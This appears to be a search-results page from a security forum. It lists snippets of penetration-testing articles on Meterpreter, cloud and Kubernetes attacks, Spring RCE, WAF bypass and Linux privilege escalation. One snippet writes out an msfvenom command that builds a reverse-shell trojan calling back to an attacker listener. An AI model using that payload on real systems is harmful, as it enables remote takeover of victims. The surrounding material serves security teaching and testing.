搜尋結果

  1. T

    標題:Meterpreter的代理詳解

    0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括為,在正常情況下僅僅只是通過利用被控制的計算機我們可能依舊無法進行網絡訪問。假設一台被控制的計算機連接有多個網絡,將其作為我們的跳板,那麼網絡隔離的手段對我們來說就形同虛設。跟著這個思路,攻擊者在被控制的跳板主機上執行路由操作,進而訪問隱藏的網絡。對新發現網絡發起的每個請求都會通過中間的雙網卡跳板傳輸,形象化一點說來就像是洞子一般。...
  2. T

    제목 : 클라우드 제공 업체 취약점으로 초기 액세스 권한을 얻습니다

    利用云提供商漏洞获取初始访问权限 2024 Blackhat Conference의 연구원은 《Kicking in the Door to the Cloud: Exploiting Cloud Provider Vulnerabilities for Initial Access》이라는 주제를 공유했습니다. 이 주제는 주로 "대리인 혼동"이라는 새로운 유형의 공격 과이 문제를 통해 AWS 계정을 공격하는 방법을 탐구합니다. 1. AppSync 漏洞 1.1. 背景 AWS AppSync는 Serverless GraphQL 및 Pub/Sub API가...
  3. T

    제목 : Shadow Resources로 AWS 계정을 공격합니다

    RSAC议题解读-通过影子资源攻击AWS帐户 1. 前言 2024 년 Blackhat Conference에서 3 명의 연구원이 《Breaching-AWS-Accounts-Through-Shadow-Resources》이라는 주제를 공유했습니다. 이 주제는 주로 "Shadow Resources"라는 새로운 유형의 공격과 이러한 리소스를 통해 AWS 계정을 공격하는 방법을 탐구합니다. 2. 背景 먼저 그림자 자원이 무엇인지에 대해 이야기 해 봅시다. Shadow Resources는 AWS 환경에서 자동 또는 반자동으로 생성되는 리소스를...
  4. T

    제목 : DotNet Code Audit Series (I)

    dotnet代码审计系列(一) 1. 概述 1.1. 背景 .NET Framework는 주로 Windows 애플리케이션을 빌드하고 실행하는 데 사용되는 Microsoft에서 개발 한 관리 코드 프레임 워크입니다. 수많은 클래스 라이브러리, CLR (Common Language Runtime) 및 응용 프로그램 개발 및 관리 도구를 제공합니다.NET 프레임 워크를 사용하여 개발 된 응용 프로그램은 일반적으로 C#, vb.net, F# 및 기타 언어로 작성됩니다. 편집 후 중간 언어 (IL)를 생성 한 다음 CLR에 의해 실행됩니다...
  5. T

    標題:Meterpreter的免殺詳解

    0×01 静态检测与对抗 1.靜態分析原理 簡單的來說,就是通過特徵碼識別靜態文件,殺軟會掃描存在磁盤上的鏡像文件,如果滿足特徵碼,就識別為惡意軟件。 惡意軟件匹配規則yara匹配惡意軟件的時候就是用的這樣的方式。 通過特徵來識別抓HASH工具QuarksPwDump,yara規則如下(查看源碼) /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as...
  6. T

    標題:Kubernetes Pod 橫向移動

    Kubernetes Pod 横向移动 1 前言 本文討論了滲透測試場景下,當攻擊者在Kubernetes 集群中擁有創建pods 權限時,由於配置不當造成集群接管的風險。提出在不同配置下,通過pods 橫向移動並最終接管集群的不同方案。 2 摘要 根據公司安全與隱私保護的設計要求,為了保證系統的信息安全,其中一個原則是最小權限原則。也就是每個用戶、系統進程或應用程序都需要使用完成任務所需的最少權限來運行。如果所配置的權限超出了所需的權限,攻擊者就會利用這些場景獲取敏感數據、入侵其它系統或進行權限提升,從而在當前網絡中進行橫向移動。 眾所周知,Kubernetes 的部署和DevOps...
  7. T

    標題:RSAC議題解讀-雲上跨租戶漏洞攻擊面分析

    RSAC议题解读-云上跨租户漏洞攻击面分析 2023 年的RSAC 會議上兩位來自Wiz 的安全研究員,分享了名為《Tackling the Recent Rise of Cross-Tenant Vulnerabilities》 的議題。兩位研究員提出一個新興的攻擊方向,即跨租戶漏洞,介紹相關概念,並在現網環境中挖掘Google Cloud、AWS、Alibaba Cloud 等跨租戶漏洞,影響巨大。 1 相关概念 1.1 多租户技术 多租戶技術是一種在雲計算環境中廣泛使用的架構設計方法,用於在單個應用程序或服務中同時支持多個獨立的租戶或用戶。...
  8. T

    標題:OAuth 2.0協議及漏洞

    OAuth 2.0协议及漏洞 1 OAuth 2.0 协议简介 OAuth 2.0 是一種授權機制,常用來授權第三方應用登錄。數據的所有者告訴系統,同意授權第三方應用獲取用戶的數據。系統從而產生一個短期的進入令牌(token),用來代替密碼,供第三方應用使用。 通俗的講,很多網站登錄時,允許使用第三方網站的身份登錄,其本質就是通過OAuth 協議進行授權。 1.1 OAuth 协议中的角色 Third-party application:第三方應用程序,通常又被稱為“客戶端”(client)。 HTTP service:HTTP 服務提供商,通常又稱為“服務提供商”。 Resource...
  9. T

    標題:vCenter 漏洞利用

    vCenter 漏洞利用 1 vSphere 背景介绍 vSphere,ESXi 和vCenter 辨析: VMware Inc **VMware Inc ** 是一家軟件公司。它開發了許多產品,尤其是各種雲解決方案。它的雲解決方案包括雲產品,數據中心產品和桌面產品等。 vSphere vSphere是在數據中心產品下的一套軟件。 vSphere 類似微軟的Office 辦公套件,Office 辦公套件包含了許多軟件如Word,Excel,Access 等。和Office 一樣,vSphere 也是一個軟件的集合。它包括了vCenter Server, ESXi 和vSphere...
  10. T

    標題:Meterpreter提權詳解

    0x01 Meterpreter自动提权 1.生成后门程序 我們在kali的命令行下直接執行以下命令獲得一個針對windows的反彈型木馬: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe這裡我們為生成的木馬指定了payload為: windows/meterpreter/reverse_tcp,反彈到的監聽端地址為172.16.11.2,監聽端口為4444,文件輸出格式為exe並保存到路徑/tmp/hack.exe 2.执行监听 use...
  11. T

    標題:Spring beans RCE 漏洞分析

    Spring beans RCE 漏洞分析 1 影响范围 JDK 9 及其以上版本 Spring 框架以及衍生的框架spring-beans-*.jar 文件或者存在CachedIntrospectionResults.class 2 漏洞复现 2.1 环境搭建 本文使用的是spring-core-rce-2022-03-29 docker 鏡像,啟動鏡像: 1 docker run --name springRCE -p 8090:8080 -d vulfocus/spring-core-rce-2022-03-29 2.2 漏洞原理 通過直接修改tomcat 的log...
  12. T

    標題:Meterpreter命令詳解

    0x01初识Meterpreter 1.1.什麼是Meterpreter Meterpreter是Metasploit框架中的一個擴展模塊,作為溢出成功以後的攻擊載荷使用,攻擊載荷在溢出攻擊成功以後給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個Meterpreter shell的鏈接。 Meterpreter...
  13. T

    標題:命令執行和代碼執行漏洞詳解

    ###命令执行定义 直接調用操作系統命令: 當應用需要調用一些外部程序去處理內容的情況下,就會用到一些執行系統命令的函數。如PHP中的system,exec,shell_exec等,當用戶可以控制命令執行函數中的參數時,將可注入惡意系統命令到正常命令中,造成命令執行攻擊。 命令執行是指攻擊者通過瀏覽器或者其他客戶端軟件提交一些cmd命令(或者bash命令)至服務器程序,服務器程序通過system、eval、exec等函數直接或者間接地調用cmd.exe執行攻擊者提交的命令。...
  14. T

    標題:開源nginx_lua_waf部署安裝

    0x01 前言 ngx_lua_waf實現WAF一句話描述,就是解析HTTP請求(協議解析模塊),規則檢測(規則模塊),做不同的防禦動作(動作模塊),並將防禦過程(日誌模塊)記錄下來。所以本文中的WAF的實現由五個模塊(配置模塊、協議解析模塊、規則模塊、動作模塊、錯誤處理模塊)組成。 原版本主要的功能如下: 1.防止sql注入,本地包含,部分溢出,fuzzing測試,xss,SSRF等web攻擊 2.防止svn/備份之類文件洩漏 3.防止ApacheBench之類壓力測試工具的攻擊 4.屏蔽常見的掃描黑客工具,掃描器 5.屏蔽異常的網絡請求 6.屏蔽圖片附件類目錄php執行權限...
  15. T

    標題:使用SUID二進製文件進行Linux權限升級技巧

    0x00 基础知识 眾所周知,在Linux中一切都以文件存在,包括具有允許或限制三個執行操作(即讀/寫/執行)權限的目錄和設備。因此,當給任何文件設置權限時,應該需要了解允許的Linux用戶或限制所有三個操作的權限。看如下圖所示: 從上圖中可看到用於為每個用戶設置組合許可的最大位數是7,它是read(4)write(2)和execute(1)操作的組合。例如,如果設置chmod 755,那麼它就相當於rwxr-xr-x。 但是當給每個用戶特殊許可時,它將變為SUID,SGID和 sticky...
  16. T

    標題:Zabbix 漏洞深入利用

    Zabbix 漏洞深入利用 1 前言 Zabbix 是一個基於WEB 界面的提供分佈式系統監視系統監視以及網絡監視功能的企業級的開源解決方案,能監視各種網絡參數,保證服務器系統服務器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位、解決存在的各種問題。 1.1 组件 Zabbix 監控系統由以下幾個組件部分構成: Zabbix ServerZabbix Server 是所有配置、統計和操作數據的中央存儲中心,也是Zabbix 監控系統的告警中心。在監控的系統中出現任何異常,將被發出通知給管理員。 Zabbix Server 的功能可分解成為三個不同的組件,分別為Zabbix...
  17. T

    標題:遠程桌面(RDP)上的滲透測試技巧和防禦

    0x00 前言 在本文中,我們將討論四種情況下的遠程桌面滲透測試技巧方法。通過這種攻擊方式,我們試圖獲取攻擊者如何在不同情況下攻擊目標系統,以及管理員在激活RDP服務時來抵禦攻擊時應採取哪些主要的防御手段。远程桌面协议(RDP)也稱為“終端服務客戶端”,是Microsoft開發的專有協議,為用戶提供通過網絡連接遠程登錄到另一台計算機的圖形界面。 RDP服務器內置於Windows操作系統中;默認情況下,服務器監聽TCP端口3389。 0x01 RDP服务攻击 1.RDP暴力破解攻击 让我们开始吧!假設admin已允許其係統中的遠程桌面服務進行本地網絡連接。...
  18. T

    標題:對象存儲攻防案例

    对象存储攻防案例 雲上存儲己經是企業中常見的一款雲上產品,伴隨著雲上業務的發展,對象存儲作為雲原生一項重要的能力,暴露出一系列的安全問題,其中的權限配置是管理人員不可忽視的,從攻擊者的視角來看幾大雲存儲的攻擊方法與利用。 1 对象存储 對象存儲中可以有多個桶(Bucket),然後把對象(Object)放在桶裡,對象又包含了三個部分:Key、Data 和Metadata。 1.1 Bucket...
  19. T

    標題:WAF Bypass

    WAF Bypass 本文介紹的思路主要圍繞針對於POST 參數的multipart/form-data 進行討論。 multipart/form-data 是為了解決上傳文件場景下文件內容較大且內置字符不可控的問題。在最初的http 協議中,並沒有上傳文件方面的功能。 RFC1867 為HTTP 協議添加了這個能力。常見的瀏覽器都已經支持。按照此規範將用戶指定的文件發送到服務器,可以按照此規範解析出用戶發送來的文件。 HTTP 傳輸的內容通過boundary 進行了分割,以--boundary 開始,並以--boundary-- 結尾。 multipart/form-data...
  20. T

    標題:靜態程序分析系列(二)

    静态程序分析(二) 1 调用图:Call Graph Construction 1.1 概念 本質上來說,一個調用圖就是從調用點到目標方法(callee)的一系列调用边。 程序調用圖是過程間分析的基礎,可以用於程序優化、理解、調試、測試等。 1.2 分类 Call Graph 有很多種不同的構造方法,本文接下來會講解兩個極端:最準確的和最快速的。 調用圖構造主要作用於面向對象語言,即以Java 為代表的,面向對象的語言。一般用到如圖四種算法,其中CHA 是最快的,指針分析K-CHA 是最準的,本文主要將CHA,後面的文章會講指針分析。 1.3 Java 中的方法调用形式...
返回
上方